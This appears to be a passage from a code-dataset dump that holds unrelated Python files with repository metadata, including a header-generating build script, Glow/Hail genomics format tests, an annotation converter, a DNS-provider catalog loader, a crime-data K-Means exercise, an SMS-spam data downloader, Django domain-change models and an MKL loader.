self.assertEqual(ob.cost_print(destination), 2, msg="Cost should be 2")
if __name__ == '__main__':
unittest.main()
| 23.45
| 79
| 0.515991
|
794fc5e890187a35e6c99ed0f6bb8b0042ec1808
| 6,508
|
py
|
Python
|
mrmpi/oink/Make.py
|
mkaczanowski/ompi-mutual-friends
|
8d3f994fe5fe648332b9c2b09ea2a712a241d6c1
|
[
"MIT"
] | null | null | null |
mrmpi/oink/Make.py
|
mkaczanowski/ompi-mutual-friends
|
8d3f994fe5fe648332b9c2b09ea2a712a241d6c1
|
[
"MIT"
] | 1
|
2021-06-12T00:50:08.000Z
|
2021-06-15T17:59:12.000Z
|
mrmpi/oink/Make.py
|
mkaczanowski/ompi-mutual-friends
|
8d3f994fe5fe648332b9c2b09ea2a712a241d6c1
|
[
"MIT"
] | 1
|
2021-06-11T19:34:43.000Z
|
2021-06-11T19:34:43.000Z
|
#!/usr/local/bin/python
# Make.py to create style_*.h files by parsing other files
# Syntax: Make.py
import sys,os,glob,commands,re
# style_command.h
files = glob.glob("*.h")
files.sort()
fp = open("style_command.tmp","w")
for file in files:
txt = open(file,"r").read()
if "COMMAND_CLASS" in txt:
print >>fp,'#include "%s"' % file
fp.close()
if os.path.exists("style_command.h"):
diff = commands.getoutput("diff style_command.h style_command.tmp")
else: diff = 1
if diff: os.rename("style_command.tmp","style_command.h")
else: os.remove("style_command.tmp")
# style_compare.h
files = glob.glob("compare_*.cpp")
files.sort()
hitlist = []
fp = open("style_compare.tmp","w")
print >>fp,"#ifdef COMPARE_STYLE\n"
pattern = re.compile("int \S+?\s*?\([^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "int (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"CompareStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_compare.h"):
diff = commands.getoutput("diff style_compare.h style_compare.tmp")
else: diff = 1
if diff: os.rename("style_compare.tmp","style_compare.h")
else: os.remove("style_compare.tmp")
# style_hash.h
files = glob.glob("hash_*.cpp")
files.sort()
hitlist = []
fp = open("style_hash.tmp","w")
print >>fp,"#ifdef HASH_STYLE\n"
pattern = re.compile("int \S+?\s*?\([^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "int (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"HashStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_hash.h"):
diff = commands.getoutput("diff style_hash.h style_hash.tmp")
else: diff = 1
if diff: os.rename("style_hash.tmp","style_hash.h")
else: os.remove("style_hash.tmp")
# style_map.h
files = glob.glob("map_*.cpp")
files.sort()
hitlist = []
fp = open("style_map.tmp","w")
print >>fp,"#if defined MAP_TASK_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined MAP_FILE_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined MAP_STRING_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined MAP_MR_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?,[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"MapStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
print >>fp,'#include "mapreduce.h"'
print >>fp,"using MAPREDUCE_NS::MapReduce;"
print >>fp,"using MAPREDUCE_NS::KeyValue;\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_map.h"):
diff = commands.getoutput("diff style_map.h style_map.tmp")
else: diff = 1
if diff: os.rename("style_map.tmp","style_map.h")
else: os.remove("style_map.tmp")
# style_reduce.h
files = glob.glob("reduce_*.cpp")
files.sort()
hitlist = []
fp = open("style_reduce.tmp","w")
print >>fp,"#ifdef REDUCE_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?,"
"[^,\)]+?,[^,\)]+?,[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"ReduceStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
print >>fp,'#include "keyvalue.h"'
print >>fp,"using MAPREDUCE_NS::KeyValue;\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_reduce.h"):
diff = commands.getoutput("diff style_reduce.h style_reduce.tmp")
else: diff = 1
if diff: os.rename("style_reduce.tmp","style_reduce.h")
else: os.remove("style_reduce.tmp")
# style_scan.h
files = glob.glob("scan_*.cpp")
files.sort()
hitlist = []
fp = open("style_scan.tmp","w")
print >>fp,"#if defined SCAN_KV_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?," +
"[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"ScanStyle(%s)" % funcname[0]
print >>fp,"\n#elif defined SCAN_KMV_STYLE\n"
pattern = re.compile("void \S+?\s*?\([^,\)]+?,[^,\)]+?,[^,\)]+?,[^,\)]+?"
",[^,\)]+?,[^,\)]+?\)",re.DOTALL)
for file in files:
txt = open(file,"r").read()
hits = re.findall(pattern,txt)
hitlist += hits
for hit in hits:
patternword = "void (\S+?)\s*?\("
funcname = re.findall(patternword,hit)
print >>fp,"ScanStyle(%s)" % funcname[0]
print >>fp,"\n#else\n"
for hit in hitlist:
print >>fp,"%s;" % hit
print >>fp,"\n#endif"
fp.close()
if os.path.exists("style_scan.h"):
diff = commands.getoutput("diff style_scan.h style_scan.tmp")
else: diff = 1
if diff: os.rename("style_scan.tmp","style_scan.h")
else: os.remove("style_scan.tmp")
| 24.651515
| 77
| 0.589121
|
794fc5f240d328af07b7f07dc10164c0f176f40c
| 7,573
|
py
|
Python
|
python/glow/hail/tests/test_from_matrix_table.py
|
mah-databricks/glow
|
958fd9480211ca8ac9229f39617e273cd8067f8c
|
[
"Apache-2.0"
] | 214
|
2019-10-17T15:10:34.000Z
|
2022-03-22T08:09:16.000Z
|
python/glow/hail/tests/test_from_matrix_table.py
|
mah-databricks/glow
|
958fd9480211ca8ac9229f39617e273cd8067f8c
|
[
"Apache-2.0"
] | 433
|
2019-10-15T14:58:10.000Z
|
2022-03-30T18:41:27.000Z
|
python/glow/hail/tests/test_from_matrix_table.py
|
mah-databricks/glow
|
958fd9480211ca8ac9229f39617e273cd8067f8c
|
[
"Apache-2.0"
] | 74
|
2019-10-15T14:02:01.000Z
|
2022-03-31T19:36:30.000Z
|
# Copyright 2019 The Glow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from glow.hail import functions
import hail as hl
from pyspark.sql import functions as fx
from pyspark.sql.types import ArrayType, StructType
import pytest
# Check that structs have the same fields and datatypes (not necessarily metadata), in any order
def _compare_struct_types(s1, s2, ignore_fields=[]):
s1_fields = [f for f in s1.fields if f.name not in ignore_fields]
s2_fields = [f for f in s2.fields if f.name not in ignore_fields]
assert set([f.name for f in s1_fields]) == set([f.name for f in s2_fields])
for f1 in s1_fields:
matching_fields = [f2 for f2 in s2_fields if f1.name == f2.name]
assert (len(matching_fields) == 1)
m = matching_fields[0]
if isinstance(m.dataType, ArrayType) and isinstance(m.dataType.elementType, StructType):
_compare_struct_types(f1.dataType.elementType, m.dataType.elementType, ignore_fields)
else:
assert f1.dataType == m.dataType
def _assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_file,
in_fmt,
out_fmt,
writer_options={},
reader_options={}):
# Convert Hail MatrixTable to Glow DataFrame and write it to a flat file
output_file = (tmp_path / 'tmp').as_uri() + '.' + in_fmt
writer = hail_df.write.format(out_fmt)
for key, value in writer_options.items():
writer = writer.option(key, value)
writer.save(output_file)
# Assert that reread DF has the same schema (excluding metadata/order)
reader = spark.read.format(in_fmt)
for key, value in reader_options.items():
reader = reader.option(key, value)
round_trip_df = reader.load(output_file)
glow_df = reader.load(input_file)
_compare_struct_types(glow_df.schema, round_trip_df.schema)
# Assert that no data is lost
matching_df = spark.read.format(in_fmt).schema(glow_df.schema).load(output_file)
assert matching_df.subtract(glow_df).count() == 0
assert glow_df.subtract(matching_df).count() == 0
def test_vcf(spark, tmp_path):
input_vcf = 'test-data/CEUTrio.HiSeq.WGS.b37.NA12878.20.21.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
_assert_lossless_adapter(spark, tmp_path, hail_df, input_vcf, 'vcf', 'vcf')
def test_gvcf(spark, tmp_path):
input_vcf = 'test-data/NA12878_21_10002403.g.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
_assert_lossless_adapter(spark, tmp_path, hail_df, input_vcf, 'vcf', 'vcf')
def test_gvcfs(spark, tmp_path):
# GVCF MatrixTables are not keyed by locus and alleles, just by locus
input_vcf = 'test-data/tabix-test-vcf/combined.chr20_18210071_18210093.g.vcf.gz'
partitions = [
hl.Interval(hl.Locus("chr20", 1, reference_genome='GRCh38'),
hl.Locus("chr20", 20000000, reference_genome='GRCh38'),
includes_end=True)
]
hail_df = functions.from_matrix_table(
hl.import_gvcfs([input_vcf], partitions, force_bgz=True, reference_genome='GRCh38')[0])
_assert_lossless_adapter(spark, tmp_path, hail_df, input_vcf, 'vcf', 'bigvcf')
def test_annotated_sites_only_vcf(spark, tmp_path):
# The Hail DataFrame will not have the split CSQ/ANN fields, as it does not have
# the VCF header metadata; we include the header when writing the round-trip VCF.
input_vcf = 'test-data/vcf/vep.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
_assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_vcf,
'vcf',
'vcf',
writer_options={'vcfHeader': input_vcf})
def test_exclude_sample_ids(spark, tmp_path):
input_vcf = 'test-data/NA12878_21_10002403.vcf'
hail_df = functions.from_matrix_table(hl.import_vcf(input_vcf), include_sample_ids=False)
hail_with_sample_id_df = functions.from_matrix_table(hl.import_vcf(input_vcf))
with pytest.raises(AssertionError):
_compare_struct_types(hail_df.schema, hail_with_sample_id_df.schema)
_assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_vcf,
'vcf',
'vcf',
reader_options={'includeSampleIds': 'false'})
def test_unphased_bgen(spark, tmp_path):
spark.conf.set('spark.sql.autoBroadcastJoinThreshold', '-1')
input_bgen = 'test-data/bgen/example.8bits.bgen'
hl.index_bgen(input_bgen, reference_genome=None)
hail_df = functions.from_matrix_table(hl.import_bgen(input_bgen, entry_fields=['GP']))
_assert_lossless_adapter(spark,
tmp_path,
hail_df,
input_bgen,
'bgen',
'bigbgen',
writer_options={'bitsPerProbability': '8'})
def test_plink(spark):
input_base = 'test-data/plink/five-samples-five-variants/bed-bim-fam/test'
# Do not recode contigs (eg. 23 -> X)
hail_df = functions.from_matrix_table(
hl.import_plink(bed=input_base + '.bed',
bim=input_base + '.bim',
fam=input_base + '.fam',
reference_genome=None,
contig_recoding={}))
# Hail does not set the genotype if it is missing; the Glow PLINK reader sets the calls to (-1, -1)
# Hail sets the genotype phased=False when reading from PLINK if the genotype is present;
# the Glow PLINK reader does not as it is always false
glow_df = spark.read.format('plink') \
.option('mergeFidIid', 'false') \
.load(input_base + '.bed')
_compare_struct_types(hail_df.schema, glow_df.schema, ignore_fields=['phased'])
matching_glow_df = glow_df.withColumn(
'genotypes',
fx.expr(
"transform(genotypes, gt -> named_struct('sampleId', gt.sampleId, 'calls', ifnull(gt.calls, array(-1,-1)), 'phased', if(gt.calls = array(-1, -1), null, false)))"
))
matching_hail_df = hail_df.select(*glow_df.schema.names)
assert matching_hail_df.subtract(matching_glow_df).count() == 0
assert matching_glow_df.subtract(matching_hail_df).count() == 0
def test_missing_locus():
input_vcf = 'test-data/1kg_sample.vcf'
mt = hl.import_vcf(input_vcf).key_rows_by('alleles').drop('locus')
with pytest.raises(ValueError):
functions.from_matrix_table(mt)
def test_missing_alleles():
input_vcf = 'test-data/1kg_sample.vcf'
mt = hl.import_vcf(input_vcf).key_rows_by('locus').drop('alleles')
with pytest.raises(ValueError):
functions.from_matrix_table(mt)
| 43.774566
| 173
| 0.643866
|
794fc7ecd02b6f16b8b020ad2062d59e3217ea69
| 2,389
|
py
|
Python
|
tools/accuracy_checker/openvino/tools/accuracy_checker/annotation_converters/see_in_the_dark.py
|
TolyaTalamanov/open_model_zoo
|
1697e60712df4ca72635a2080a197b9d3bc24129
|
[
"Apache-2.0"
] | 2,201
|
2018-10-15T14:37:19.000Z
|
2020-07-16T02:05:51.000Z
|
tools/accuracy_checker/openvino/tools/accuracy_checker/annotation_converters/see_in_the_dark.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | 759
|
2018-10-18T07:43:55.000Z
|
2020-07-16T01:23:12.000Z
|
tools/accuracy_checker/openvino/tools/accuracy_checker/annotation_converters/see_in_the_dark.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | 808
|
2018-10-16T14:03:49.000Z
|
2020-07-15T11:41:45.000Z
|
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
from .format_converter import FileBasedAnnotationConverter, ConverterReturn
from ..representation import ImageProcessingAnnotation
from ..representation.image_processing import GTLoader
from ..utils import read_txt, check_file_existence
class SeeInTheDarkDatasetConverter(FileBasedAnnotationConverter):
__provider__ = 'see_in_the_dark'
def convert(self, check_content=False, progress_callback=None, progress_interval=100, **kwargs):
images_list = read_txt(self.annotation_file)
annotations = []
content_errors = None if not check_content else []
num_images = len(images_list)
for idx, line in enumerate(images_list):
input_image, gt_image = line.split(' ')[:2]
identifier = Path(input_image).name
gt_identifier = Path(gt_image).name
in_exposure = float(identifier[9:-5])
gt_exposure = float(identifier[9:-5])
ratio = min(gt_exposure / in_exposure, 300)
if check_content:
if not check_file_existence(self.annotation_file.parent / input_image):
content_errors.append('{}: does not exist'.format(self.annotation_file.parent / input_image))
if not check_file_existence(self.annotation_file.parent / gt_image):
content_errors.append('{}: does not exist'.format(self.annotation_file.parent / gt_image))
annotation = ImageProcessingAnnotation(identifier, gt_identifier, gt_loader=GTLoader.RAWPY)
annotation.metadata['ratio'] = ratio
annotations.append(annotation)
if progress_callback and idx % progress_interval:
progress_callback(idx * 100 / num_images)
return ConverterReturn(annotations, None, content_errors)
| 47.78
| 113
| 0.714525
|
794fc8044a33048ff270eeba53862e6f1b42c964
| 2,472
|
py
|
Python
|
sewer/catalog.py
|
kylejohnson/sewer
|
056ac64fe294fb284ec5b920ec1a9425dd254e92
|
[
"MIT"
] | 135
|
2017-12-31T22:01:33.000Z
|
2022-01-20T18:18:11.000Z
|
sewer/catalog.py
|
kylejohnson/sewer
|
056ac64fe294fb284ec5b920ec1a9425dd254e92
|
[
"MIT"
] | 149
|
2018-01-10T10:36:18.000Z
|
2021-07-01T16:22:47.000Z
|
sewer/catalog.py
|
kylejohnson/sewer
|
056ac64fe294fb284ec5b920ec1a9425dd254e92
|
[
"MIT"
] | 61
|
2018-03-05T16:58:55.000Z
|
2021-05-21T01:30:07.000Z
|
import codecs, importlib, json, os
from typing import Dict, List, Sequence
from .auth import ProviderBase
class ProviderDescriptor:
def __init__(
self,
*,
name: str,
desc: str,
chals: Sequence[str],
args: Sequence[Dict[str, str]],
deps: Sequence[str],
path: str = None,
cls: str = None,
features: Sequence[str] = None,
memo: str = None,
) -> None:
"initialize a driver descriptor from one item in the catalog"
self.name = name
self.desc = desc
self.chals = chals
self.args = args
self.deps = deps
self.path = path
self.cls = cls
self.features = [] if features is None else features
self.memo = memo
def __str__(self) -> str:
return "Descriptor %s" % self.name
def get_provider(self) -> ProviderBase:
"return the class that implements this driver"
module_name = self.path if self.path else ("sewer.providers." + self.name)
module = importlib.import_module(module_name)
return getattr(module, self.cls if self.cls else "Provider")
class ProviderCatalog:
def __init__(self, filepath: str = "") -> None:
"intialize a catalog from either the default catalog.json or one named by filepath"
if not filepath:
here = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(here, "catalog.json")
with codecs.open(filepath, "r", encoding="utf8") as f:
raw_catalog = json.load(f)
items = {} # type: Dict[str, ProviderDescriptor]
for item in raw_catalog:
k = item["name"]
if k in items:
print("WARNING: duplicate name %s skipped in catalog %s" % (k, filepath))
else:
items[k] = ProviderDescriptor(**item)
self.items = items
def get_item_list(self) -> List[ProviderDescriptor]:
"return the list of items in the catalog, sorted by name"
res = [i for i in self.items.values()]
res.sort(key=lambda i: i.name)
return res
def get_descriptor(self, name: str) -> ProviderDescriptor:
"return the ProviderDescriptor that matches name"
return self.items[name]
def get_provider(self, name: str) -> ProviderBase:
"return the class that implements the named driver"
return self.get_descriptor(name).get_provider()
| 31.291139
| 91
| 0.601537
|
794fca761acfc988e57563c500c6b9c9ef668e2d
| 2,627
|
py
|
Python
|
Module5/assignment1.py
|
sidbose/PythonForDataScienceBasics
|
191f56904b1fefebd441e3fde63f52b6936959d8
|
[
"MIT"
] | null | null | null |
Module5/assignment1.py
|
sidbose/PythonForDataScienceBasics
|
191f56904b1fefebd441e3fde63f52b6936959d8
|
[
"MIT"
] | null | null | null |
Module5/assignment1.py
|
sidbose/PythonForDataScienceBasics
|
191f56904b1fefebd441e3fde63f52b6936959d8
|
[
"MIT"
] | null | null | null |
#
# TODO: Import whatever needs to be imported to make this work
#
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from sklearn.cluster import KMeans
# Look Pretty
# matplotlib.style.use('ggplot')
plt.style.use('ggplot')
#
# TODO: To procure the dataset, follow these steps:
# 1. Navigate to: https://data.cityofchicago.org/Public-Safety/Crimes-2001-to-present/ijzp-q8t2
# 2. In the 'Primary Type' column, click on the 'Menu' button next to the info button,
# and select 'Filter This Column'. It might take a second for the filter option to
# show up, since it has to load the entire list first.
# 3. Scroll down to 'GAMBLING'
# 4. Click the light blue 'Export' button next to the 'Filter' button, and select 'Download As CSV'
def doKMeans(df):
#
# INFO: Plot your data with a '.' marker, with 0.3 alpha at the Longitude,
# and Latitude locations in your dataset. Longitude = x, Latitude = y
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(df.Longitude, df.Latitude, marker='.', alpha=0.3, c='green')
#
# TODO: Filter df so that you're only looking at Longitude and Latitude,
# since the remaining columns aren't really applicable for this purpose.
#
k_means_data = df[['Longitude', 'Latitude']]
#
# TODO: Use K-Means to try and find seven cluster centers in this df.
# Be sure to name your kmeans model `model` so that the printing works.
#
kmeans_model = KMeans(n_clusters=7)
kmeans_model.fit(k_means_data)
#
# INFO: Print and plot the centroids...
centroids = kmeans_model.cluster_centers_
ax.scatter(centroids[:,0], centroids[:,1], marker='^', c='red', alpha=0.9, linewidths=3, s=169)
print centroids
#
# TODO: Load your dataset after importing Pandas
#
df = pd.read_csv('Datasets/Crimes.csv')
#
# TODO: Drop any ROWs with nans in them
#
df.dropna(axis=0, how='any', inplace=True)
df.reset_index(drop=True)
#
# TODO: Print out the dtypes of your dset
#
print df.dtypes
#
# Coerce the 'Date' feature (which is currently a string object) into real date,
# and confirm by re-printing the dtypes. NOTE: This is a slow process...
#
df['Date'] = pd.to_datetime(df['Date'])
print df.dtypes
# INFO: Print & Plot your data
doKMeans(df)
#
# TODO: Filter out the data so that it only contains samples that have
# a Date > '2011-01-01', using indexing. Then, in a new figure, plot the
# crime incidents, as well as a new K-Means run's centroids.
#
df = df[df['Date'] > '2011-01-01']
# INFO: Print & Plot your data
doKMeans(df)
plt.show()
| 27.652632
| 100
| 0.680244
|
794fcbf16641ea1a76a46c1b9b03ea6b0192d253
| 2,319
|
py
|
Python
|
djnic/cambios/models.py
|
avdata99/nic
|
70399bd78fd2b4b496d338e7959867ad12cdf477
|
[
"MIT"
] | 8
|
2021-05-01T13:03:22.000Z
|
2021-12-17T21:50:04.000Z
|
djnic/cambios/models.py
|
avdata99/nic
|
70399bd78fd2b4b496d338e7959867ad12cdf477
|
[
"MIT"
] | 16
|
2020-11-20T23:18:22.000Z
|
2021-04-08T20:09:35.000Z
|
djnic/cambios/models.py
|
OpenDataCordoba/nic
|
f9528856e13d106bdfb476cab1236bc5b8a92183
|
[
"MIT"
] | null | null | null |
from django.db import models
from registrantes.models import Registrante
class CambiosDominio(models.Model):
""" a domain is checks (having or no aby changes) """
dominio = models.ForeignKey('dominios.Dominio', on_delete=models.CASCADE, related_name='cambios')
momento = models.DateTimeField()
# to import "vistos" table and merge with this already imported (thats why the default at True) table
have_changes = models.BooleanField(default=True)
def __str__(self):
return f'{self.dominio} {self.momento}'
def registrantes_en_cambio(self):
""" Si cambio el registrante devuelve el nuevo y el anterior """
registrante_anterior = None
registrante_nuevo = None
for campo in self.campos.all():
if campo.campo == 'registrant_legal_uid':
if campo.anterior != '':
registrante_anterior = Registrante.objects.filter(legal_uid=campo.anterior).first()
if campo.nuevo != '':
registrante_nuevo = Registrante.objects.filter(legal_uid=campo.nuevo).first()
return registrante_anterior, registrante_nuevo
class CampoCambio(models.Model):
""" Cada uno de los campos que cambio
Todos string por mas que haya fechas.
Problemas con el DNS porque el sistema anterior tenia 5
campos separads y ahora esta bien hecho.
"""
cambio = models.ForeignKey(CambiosDominio, on_delete=models.CASCADE, related_name='campos')
campo = models.CharField(max_length=240, null=True, db_index=True)
anterior = models.CharField(max_length=240, null=True)
nuevo = models.CharField(max_length=240, null=True)
uid_anterior = models.IntegerField(default=0, db_index=True, help_text="to be deleted after migration")
def __str__(self):
campo = self.campo or ''
anterior = self.anterior or ''
nuevo = self.nuevo or ''
return f'{campo} from {anterior} to {nuevo}'
def brother(self, campo):
""" campo cambiado en base a otro campo del mismo cambio """
return self.cambio.campos.filter(campo=campo).first()
def brother_registrant_name(self):
return self.brother(campo='registrant_name')
def brother_expire(self):
return self.brother(campo='dominio_expire')
| 39.305085
| 107
| 0.675722
|
794fcbf6f1bc104288d2eac3977910ad2a3029bc
| 1,306
|
py
|
Python
|
src/make_dataframe.py
|
datavistics/sms_spam
|
d858fdd25371979b42fb66093866479fe098aff0
|
[
"BSD-3-Clause"
] | null | null | null |
src/make_dataframe.py
|
datavistics/sms_spam
|
d858fdd25371979b42fb66093866479fe098aff0
|
[
"BSD-3-Clause"
] | null | null | null |
src/make_dataframe.py
|
datavistics/sms_spam
|
d858fdd25371979b42fb66093866479fe098aff0
|
[
"BSD-3-Clause"
] | null | null | null |
import zipfile
from pathlib import Path
import pandas as pd
import requests
project_dir = Path(__file__).parents[1]
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip'
data_path = project_dir / 'data' / 'smsspamcollection.zip'
file_path = project_dir / 'data' / 'SMSSpamCollection'
def download_data():
"""
Download project data
:return:
"""
r = requests.get(url, allow_redirects=True)
open(data_path, 'wb').write(r.content)
print('Downloading Zip file: ', str(data_path))
def unzip_data():
"""
Unzip data that was downloaded
:return:
"""
assert data_path.is_file(), 'You need to double check the download code'
zip_ref = zipfile.ZipFile(data_path, 'r')
zip_ref.extractall(data_path.parent)
zip_ref.close()
print('Unzipping Zip file: ', str(data_path))
def make_dataframe():
"""
Create dataframe from tsv file
:return:
"""
assert file_path.is_file(), 'You need to double check the unzipping code'
df = pd.read_csv(file_path, sep='\t', names=['label', 'text'])
return df
def master_data_handler():
if not data_path.is_file():
download_data()
if not file_path.is_file():
unzip_data()
if __name__ == '__main__':
master_data_handler()
| 23.745455
| 93
| 0.674579
|
794fcc2d867456fa71cc034dd4048ec7bc1f178a
| 3,070
|
py
|
Python
|
assets/misc/Algorithm_practice/test.py
|
oliviapy960825/oliviapy960825.github.io
|
7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde
|
[
"CC-BY-3.0"
] | null | null | null |
assets/misc/Algorithm_practice/test.py
|
oliviapy960825/oliviapy960825.github.io
|
7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde
|
[
"CC-BY-3.0"
] | null | null | null |
assets/misc/Algorithm_practice/test.py
|
oliviapy960825/oliviapy960825.github.io
|
7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde
|
[
"CC-BY-3.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 17 16:38:08 2020
@author: wangpeiyu
"""
"""
a1='11000000 10101000 00000001 00000001'
b='11111111 11111111 11111111 11110000'
a2='11000000 10101000 00000001 00000000'
"""
"""
def BFS(length, matrix,row,col,count):
while row<length-1 and col<length-1:
if matrix[row][col+1]==1 and matrix[row+1][col]==1 and matrix[row+1][col+1]==1:
count+=1
return BFS(length,matrix,row+1,col+1,count)
def max_area(length, matrix):
count=1
for i in range(length):
for j in range(length):
if matrix[i][j]==1:
count=max(count,BFS(length,matrix,0,0,1))
return (count**2)
length=3
matrix=[[1,1,0],[1,1,1],[1,1,0]]
print(max_area(length,matrix))
print("{0:b}".format(192))
print("192.68".split("."))
a1='11000000 10101000 00000001 00000001'
b='11111111 11111111 11111111 11110000'
print(1 & 2)
"""
import random
def find_alter(string):
stack=[]#using stack to record/memorize the index of '{' and '}'
index=0 #starting from index 0
def helper(string,start_index,end_index): #helper function to help decide on the alternative text between '{' and '}'
middle_string=string[start_index+1:end_index] # we extract the substring between the start and end index
middle_string=middle_string.split('|') #we split the alternative texts by '|' because each is a viable solution
rand=random.randint(0,len(middle_string)-1) #generate a random number representing the index of the chosen alternative text
return middle_string[rand] #we now have chosen the alternative text, and we return it
while index<len(string):#set stop condition
if string[index]=='{':
stack.append(index) #record the index of "{" in stack, and later on when we meet "}" we pop it from stack
index+=1
elif string[index]=="}":
start_index=stack.pop()
"""
we meet the first matching "}" for "{", thus we pop the index on top of the stack and extract the substring
between the start_index and end_index and generate alternative text within it--I use random generator
"""
end_index=index
before_string=string[:start_index] #we keep track of the substring before the substring we want to modify
after_string=string[end_idex+1:]#we keep track of the substring after the substring we want to modify
middle_string=helper(string,start_index,end_index)#we use the helper function to help modify and decide on the alternative text we want to input in the text
string=before_string+middle_string+after_string
index=len(before_string_middle_string)
else: # we keep increasing the index pointer
index+=1
return string
string="{I am|I'm} {working on|starting} this {online |}interview. I hope Cortx thinks I am {{very|extremely} qualified|great|awesome}{!|.}"
print(find_alter(string))
| 42.054795
| 168
| 0.656678
|
794fcc625e953aa2835dede95b32432878ae2964
| 973
|
py
|
Python
|
pyMKL/loadMKL.py
|
jcapriot/pyMKL
|
4b960585903bc1504dec2e37aa09d67849986322
|
[
"MIT"
] | 10
|
2016-05-18T09:33:39.000Z
|
2021-03-13T07:10:46.000Z
|
pyMKL/loadMKL.py
|
jcapriot/pyMKL
|
4b960585903bc1504dec2e37aa09d67849986322
|
[
"MIT"
] | 10
|
2016-04-29T16:07:21.000Z
|
2022-01-02T19:15:06.000Z
|
pyMKL/loadMKL.py
|
jcapriot/pyMKL
|
4b960585903bc1504dec2e37aa09d67849986322
|
[
"MIT"
] | 16
|
2016-04-29T14:14:38.000Z
|
2022-01-04T11:52:56.000Z
|
from ctypes import CDLL, RTLD_GLOBAL
import sys, os
platform = sys.platform
libname = {'linux':'libmkl_rt.so', # works for python3 on linux
'linux2':'libmkl_rt.so', # works for python2 on linux
'darwin':'libmkl_rt.dylib',
'win32':'mkl_rt.dll'}
